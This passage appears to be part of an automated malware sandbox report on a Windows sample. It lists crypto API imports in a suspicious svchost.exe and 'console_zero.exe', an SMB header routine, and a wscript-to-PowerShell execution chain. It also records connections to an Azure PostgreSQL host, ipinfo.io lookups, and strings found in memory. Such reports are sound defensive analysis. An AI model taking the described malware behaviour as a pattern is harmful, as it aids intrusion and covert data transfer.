Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE550D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 46_2_00007FFA2CE550D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA92A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug, 46_2_00007FFA2CEA92A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE6F290 CRYPTO_realloc, 46_2_00007FFA2CE6F290
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE25240 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE25240
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init, 46_2_00007FFA2CE2321D
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE63220 CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE63220
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE41210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free, 46_2_00007FFA2CE41210
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free, 46_2_00007FFA2CE73200
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE551E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free, 46_2_00007FFA2CE551E0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE751D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free, 46_2_00007FFA2CE751D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE213A0 CRYPTO_free, 46_2_00007FFA2CE213A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE993A0 ERR_new,ERR_set_debug,CRYPTO_clear_free, 46_2_00007FFA2CE993A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE73380 CRYPTO_free, 46_2_00007FFA2CE73380
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE9B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free, 46_2_00007FFA2CE9B370
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE2D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free, 46_2_00007FFA2CE2D360
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE37360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free, 46_2_00007FFA2CE37360
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CEA5360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free, 46_2_00007FFA2CEA5360
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE4D310
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE492F0 CRYPTO_realloc,memcpy, 46_2_00007FFA2CE492F0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B2D0 CRYPTO_free, 46_2_00007FFA2CE5B2D0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE432C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock, 46_2_00007FFA2CE432C0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE5B4B0 CRYPTO_zalloc, 46_2_00007FFA2CE5B4B0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B4A0 CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE8B4A0
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE4D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free, 46_2_00007FFA2CE4D440
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE91430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug, 46_2_00007FFA2CE91430
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE8B420 CRYPTO_free, 46_2_00007FFA2CE8B420
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA3310E3C0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3311C300 BCryptGenRandom, 51_2_00007FFA3311C300
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 51_2_00007FFA3313E270
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33123110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA33123110
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA331231A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA331231A0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext, 51_2_00007FFA330F1180
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313E7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx, 51_2_00007FFA3313E7A0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313B4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA3313B4E0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 51_2_00007FFA3310E4F0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3311C4D0 memset,BCryptGenRandom, 51_2_00007FFA3311C4D0
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E570 CryptHashData, 51_2_00007FFA3310E570
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3310E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 51_2_00007FFA3310E580
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free, 51_2_00007FFA3313BA86
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA33123090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext, 51_2_00007FFA33123090
Source: C:\Windows\System32\console_zero.exe Code function: 51_2_00007FFA3313DE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext, 51_2_00007FFA3313DE50
Source: C:\Windows\System32\console_zero.exe Code function: -----BEGIN PUBLIC KEY----- 51_2_00007FFA3313FA60
Source: console_zero.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Contains functionality to create an SMB header
Source: C:\Windows\System32\console_zero.exe Code function: mov dword ptr [rbp+04h], 424D53FFh 51_2_00007FFA33124930
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle, 46_2_00007FFA4185014C
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError, 46_2_00007FFA41850008

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.17:49730 -> 20.71.50.126:5432
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /api/timezone/Etc/UTC HTTP/1.1Host: worldtimeapi.orgAccept: */*
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View IP Address: 213.188.196.246 213.188.196.246
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\svchost.exe Code function: 46_2_00007FFA2CE61C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark, 46_2_00007FFA2CE61C20
Source: global traffic HTTP traffic detected: GET /api/timezone/Etc/UTC HTTP/1.1Host: worldtimeapi.orgAccept: */*
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: worldtimeapi.org
Source: global traffic DNS traffic detected: DNS query: universalsqlserver.postgres.database.azure.com
Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/advqtdv6t35gmqvdg3dzxo4krmzq_117.0.5938.149/117.0.5
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.3.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: svchost.exe, 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmp, usvc.dat.31.dr String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: svchost.exe, 0000002E.00000002.2347123421.00000224C242B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe.31.dr, x338625.dat.31.dr, usvc.dat.31.dr String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
Source: console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe.31.dr, usvc.dat.31.dr String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
Source: console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCnB
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000009.00000002.1368820099.000001DEFEA13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp, libintl-9.dll.31.dr, usvc.dat.31.dr String found in binary or memory: http://www.gnu.org/licenses/
Source: console_zero.exe String found in binary or memory: http://www.zlib.net/
Source: console_zero.exe, 00000033.00000002.2226412628.00007FFA51137000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr String found in binary or memory: http://www.zlib.net/D
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: console_zero.exe String found in binary or memory: https://curl.se/
Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/V
Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/copyright.html
Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: console_zero.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000002.1368953627.000001DEFEA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368214670.000001DEFEA5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1368970767.000001DEFEA44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.1368882682.000001DEFEA27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368119081.000001DEFEA67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000003.00000003.1202792782.00000150FC750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000022.00000002.1899492113.000001C7C0D11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: svchost.exe, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, x338625.dat.31.dr, usvc.dat.31.dr String found in binary or memory: https://ipinfo.io/json
Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
